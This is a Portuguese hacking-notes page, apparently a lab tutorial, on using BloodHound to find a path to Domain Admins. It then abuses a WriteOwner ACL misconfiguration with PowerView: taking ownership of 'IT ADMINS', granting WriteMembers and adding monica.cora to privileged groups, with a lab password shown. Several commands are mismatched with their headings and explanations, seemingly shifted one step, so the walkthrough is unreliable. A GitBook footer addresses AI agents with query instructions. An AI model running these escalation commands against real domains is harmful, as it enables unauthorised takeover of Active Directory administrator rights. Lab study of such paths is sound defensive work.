> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/active-directory/acl-security-descriptors-and-permissions/bloodhound-analysis.md).

# Análise com BloodHound

Após gerar os objetos vulneráveis, você pode reiniciar uma coleta do SharpHound:

{% code overflow="wrap" %}

```powershell
 . ./SharpHound.exe
```

{% endcode %}

<figure><img src="/files/07a672669b1d317167ef78455582feca4bf17a33" alt=""><figcaption></figcaption></figure>

O SharpHound gera um `.zip` arquivo.

Depois, inicie o BloodHound:

{% code overflow="wrap" %}

```powershell
bloodhound --no-sandbox &
```

{% endcode %}

Em seguida, importamos o `.zip` arquivo no BloodHound.

Após a importação, podemos ver:

* novos usuários;
* novos grupos;
* as novas ACLs;
* os caminhos de privilégio;
* relações entre objetos.

<figure><img src="/files/d2dfaf8b66433a1fd7e121ffff73f3c63bf6b768" alt=""><figcaption></figcaption></figure>

### Encontrando um caminho para o Domain Admin

<figure><img src="/files/5f1b21212aea68108b85cf01de39b03524f73d93" alt=""><figcaption></figcaption></figure>

No BloodHound, usamos a análise:

{% code overflow="wrap" %}

```bash
Encontrar os caminhos mais curtos para os Domain Admins
```

{% endcode %}

<figure><img src="/files/f34b0d15799eb490e9c21fb330f89e5973e67578" alt=""><figcaption></figcaption></figure>

Essa consulta encontra os caminhos mais curtos até o grupo de administradores do domínio.

No laboratório, o BloodHound mostra, por exemplo, um grupo:

```bash
IT ADMINS
```

<figure><img src="/files/48361749f6270c8dae70db736b92bb006cb25432" alt=""><figcaption></figcaption></figure>

Esse grupo contém vários usuários, como:

```bash
Deidre Corry
Lisette.pru
Gypsy.nelle
```

<figure><img src="/files/ad7cbe614e2e2fbf66b3886b5255fbb5078c4ea3" alt=""><figcaption></figcaption></figure>

Podemos então analisar as relações entre grupos, por exemplo:

```wasm
Project Management -> IT ADMINS -> Domain Admins
```

O objetivo é entender como uma má configuração de permissões pode levar a um grupo privilegiado.

<figure><img src="/files/273d2b2d33a6252c2ca2e6337b0809d15f5b29e2" alt=""><figcaption></figcaption></figure>

### Exploração de uma configuração ruim de ACL

> Esta etapa é realizada apenas em um laboratório autorizado.

Neste cenário, o usuário `monica.cora` tem um caminho utilizável até o grupo:

```
IT ADMINS
```

Usaremos nossos privilégios para tomar controle deste grupo e, em seguida, avançar para um grupo com mais privilégios.

<figure><img src="/files/7a42263d9a5e6a46f7b76298b1848f5f5b345943" alt=""><figcaption></figcaption></figure>

### Conexão com o usuário monica.cora

<figure><img src="/files/8bdb12031e806d6b08a351c536d6d00c807c0d56" alt=""><figcaption></figcaption></figure>

Conectamo-nos com o usuário:

{% code overflow="wrap" %}

```
monica.cora
```

{% endcode %}

Senha usada no laboratório:

```
Password123$
```

Abrimos uma sessão do PowerShell com este usuário:

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell">runas /user:whoami/monica.cora /netonly powershell

<strong>. C:/Users/user1/Desktop/PowerView.ps1
</strong></code></pre>

Explicação:

* `runas` inicia um programa com outro usuário;
* `/netonly` usa essas credenciais apenas para acesso à rede;
* `powershell` abre uma nova sessão do PowerShell.

### Carregando o PowerView

Na nova sessão do PowerShell:

{% code overflow="wrap" %}

```bash
Set-DomainObjectOwner -Identity "IT ADMINS" -OwnerIdentity monica.cora
```

{% endcode %}

Isso carrega o PowerView na `monica.cora`sessão de

<figure><img src="/files/c000eef8caab2c094a6c9043b43a49591a7eca41" alt=""><figcaption></figcaption></figure>

### Exploração do direito WriteOwner

O **WriteOwner** direito permite alterar o proprietário de um objeto do Active Directory.

Neste cenário, `monica.cora` torna-se o proprietário do grupo:

```
IT ADMINS
```

<figure><img src="/files/f7768b92670dce7dbe647548a9cb0bf1dacb906a" alt=""><figcaption></figcaption></figure>

Ordem :

{% code overflow="wrap" %}

```powershell
Add-DomainObjectAcl -TargetIdentity "IT ADMINS" -Rights WriteMembers -PrincipalIdentity monica.cora
```

{% endcode %}

Após esta etapa, o proprietário do objeto passa a ser:

```
WHOAMI/monica.cora
```

<figure><img src="/files/308d5b8bcda10308985e4254b8a933da772e4126" alt=""><figcaption></figcaption></figure>

### Direito WriteMembers adicionado

Ser o proprietário de um objeto geralmente permite modificar sua DACL.

Portanto, adicionamos a `monica.cora` o direito de modificar os membros do `IT ADMINS` grupo.

{% code overflow="wrap" %}

```powershell
Add-DomainGroupMember -Identity 'IT ADMINS' -Members 'monica.cora'
```

{% endcode %}

Esse direito permite `monica.cora` adicionar membros ao `IT ADMINS` grupo.

<figure><img src="/files/c97e3022c4a6add4645b1105b2f82f36c6c18c11" alt=""><figcaption></figcaption></figure>

### monica.cora foi adicionada ao grupo IT ADMINS

Agora adicionamos `monica.cora` ao grupo:

{% code overflow="wrap" %}

```powershell
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'monica.cora'
```

{% endcode %}

Para verificar:

```wasm
Get-DomainGroupMember -Identity "IT ADMINS" | select MemberName
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/active-directory/acl-security-descriptors-and-permissions/bloodhound-analysis.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
